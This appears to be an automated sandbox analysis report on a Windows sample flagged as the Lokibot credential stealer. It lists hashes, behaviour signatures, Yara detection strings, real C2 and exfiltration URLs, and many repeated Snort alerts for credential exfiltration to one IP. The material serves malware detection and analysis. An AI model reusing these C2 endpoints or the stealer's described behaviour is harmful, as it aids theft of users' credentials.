Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report U001P56ybm.exe

Overview

General Information

Sample Name:U001P56ybm.exe
Analysis ID:528740
MD5:969e2ccfcacf3573de922d9bce81e3fd
SHA1:c3dd33a00d4dad9330d0c2dbc0c3b75396c70f8b
SHA256:4a059628d9f56799d68937821b355477502fe0704d41a75c372b1c036061d59f
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • U001P56ybm.exe (PID: 4640 cmdline: "C:\Users\user\Desktop\U001P56ybm.exe" MD5: 969E2CCFCACF3573DE922D9BCE81E3FD)
    • U001P56ybm.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\U001P56ybm.exe" MD5: 969E2CCFCACF3573DE922D9BCE81E3FD)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 36 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.0.U001P56ybm.exe.400000.6.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13e78:$s1: http://
        • 0x17633:$s1: http://
        • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13e80:$s2: https://
        • 0x13e78:$f1: http://
        • 0x17633:$f1: http://
        • 0x13e80:$f2: https://
        2.0.U001P56ybm.exe.400000.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          2.0.U001P56ybm.exe.400000.6.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            2.0.U001P56ybm.exe.400000.6.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              2.0.U001P56ybm.exe.400000.6.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              Click to see the 82 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Multi AV Scanner detection for submitted fileShow sources
              Source: U001P56ybm.exeReversingLabs: Detection: 25%
              Antivirus detection for URL or domainShow sources
              Source: http://194.85.248.167/imt/fre.phpAvira URL Cloud: Label: malware
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dllReversingLabs: Detection: 22%
              Source: 2.0.U001P56ybm.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
              Source: U001P56ybm.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: Binary string: wntdll.pdbUGP source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405250
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,0_2_00405C22
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_1_00403D74

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49744 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49744 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49745 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49745 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49746
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49747
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49748 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49748
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49749
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49750
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49751 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49751
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49752
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49755 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49755
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49756 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49756
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49757
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49758 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49758
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49759 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49759
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49760 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49760
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49761 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49761
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49762 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49762
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49763 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49763
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49765 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49765
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49766 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49766
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49769 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49769
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49770 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49770
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49785 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49785 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49785 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49785 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49785
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49809 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49809 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49809 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49809 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49809
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49813 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49813 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49813 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49813 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49813
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49814 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49814 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49814 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49814 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49814
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49817 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49817 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49817 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49817 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49817
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49818 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49818 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49818 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49818 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49818
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49819 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49819 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49819 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49819 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49819
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49820 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49820 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49820 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49820 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49820
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49821 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49821 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49821 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49821 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49821
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49822 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49822 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49822 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49822 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49822
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49823 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49823 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49823 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49823 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49823
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49825 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49825 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49825 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49825 -> 194.85.248.167:80
